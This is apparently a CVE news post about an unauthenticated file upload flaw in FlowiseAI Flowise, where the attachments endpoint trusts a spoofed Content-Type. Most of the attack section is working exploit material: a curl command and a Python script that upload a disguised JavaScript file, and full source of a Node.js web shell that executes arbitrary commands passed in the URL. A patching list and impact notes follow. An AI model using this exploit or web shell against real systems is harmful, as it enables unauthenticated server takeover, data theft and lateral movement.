Listen to this Post
The vulnerability exists in the `/api/v1/attachments/:chatflowId/:chatId` endpoint, which is listed in `WHITELIST_URLS` allowing unauthenticated access. The server validates uploads based on MIME types defined in `chatbotConfig.fullFileUpload.allowedUploadFileTypes` but implicitly trusts the client-provided `Content-Type` header (file.mimetype) without verifying the file’s actual content via magic bytes or checking the file extension (file.originalname). An attacker can bypass restrictions by spoofing the `Content-Type` as a permitted type (e.g., application/pdf) while uploading malicious JavaScript files. The files are processed via `addArrayFilesToStorage` and persist in backend storage (S3, GCS, or local disk). The route is mounted at `/api/v1/attachments` and whitelisted in constants.ts, bypassing JWT authentication entirely. Multer storage configuration saves files without any file type validation beyond the client-provided MIME type. The `createAttachment.ts` function only checks against `allowedFileTypes` using the spoofed `file.mimetype` value. This allows unauthenticated arbitrary file upload that can be chained with static hosting features to achieve Stored XSS, malicious file hosting, or Remote Code Execution (RCE) .
Platform: FlowiseAI Flowise
Version: 1.4.3 through 1.6.5
Vulnerability: Unauthenticated File Upload
Severity: High
date: October 6, 2025
Prediction: January 2026
What Undercode Say:
Analytics
The vulnerability stems from improper input validation in the file upload mechanism. The system relies solely on client-supplied MIME types without server-side content verification. The attack vector is network-based with low attack complexity, requiring no privileges or user interaction. CVSS v3 base score is approximately 8.2 (High) due to potential for RCE. EPSS probability is 0.5% with ranking in the 60th percentile.
Bash Commands & Code
Generate UUID for chatId (Linux/macOS) uuidgen Manual exploitation curl command curl -X POST "http://target:3000/api/v1/attachments/891f64a2-a26f-4169-b333-905dc96c200a/$(uuidgen)" \ -F "[email protected];type=application/pdf" Python exploitation script import requests import uuid target = "http://localhost:3000" chatflow_id = "891f64a2-a26f-4169-b333-905dc96c200a" chat_id = str(uuid.uuid4()) url = f"{target}/api/v1/attachments/{chatflow_id}/{chat_id}" files = {'files': ('shell.js', open('shell.js', 'rb'), 'application/pdf')} response = requests.post(url, files=files) print(f"Status: {response.status_code}") print(response.text)
Exploit
// shell.js - Node.js web shell
const { exec } = require('child_process');
const http = require('http');
const server = http.createServer((req, res) => {
const url = new URL(req.url, 'http://localhost');
const cmd = url.searchParams.get('cmd');
if (cmd) {
exec(cmd, (error, stdout, stderr) => {
res.writeHead(200, {'Content-Type': 'text/plain'});
if (error) res.end(<code>Error: ${error.message}</code>);
else res.end(stdout || stderr);
});
} else {
res.writeHead(200, {'Content-Type': 'text/html'});
res.end('
<h1>Node.js Web Shell</h1>
Use ?cmd=command
');
}
});
server.listen(8888, '0.0.0.0');
Protection from this CVE
1. Remove `/api/v1/attachments` from `WHITELIST_URLS` in constants.ts
- Implement file content validation using magic bytes (libmagic or file-type)
3. Validate file extensions against allowed types
- Store uploaded files outside webroot with random filenames
5. Implement strict MIME type validation on server-side
6. Add authentication requirement for all upload endpoints
- Deploy WAF rules to block suspicious file uploads
Impact
Successful exploitation allows unauthenticated attackers to upload arbitrary files including web shells, leading to complete server compromise. Attackers can execute system commands, access sensitive data, pivot to internal networks, and use compromised server for further attacks. In multi-tenant environments using shared storage (S3/GCS), compromise can spread across infrastructure. Stored XSS attacks can steal session cookies and perform account takeovers. The vulnerability is critical for production deployments with default configurations .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow DailyCVE & Stay Tuned:
𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin
Eclipse Jetty, Resource Leak, CVE-2026-1605 (Medium)
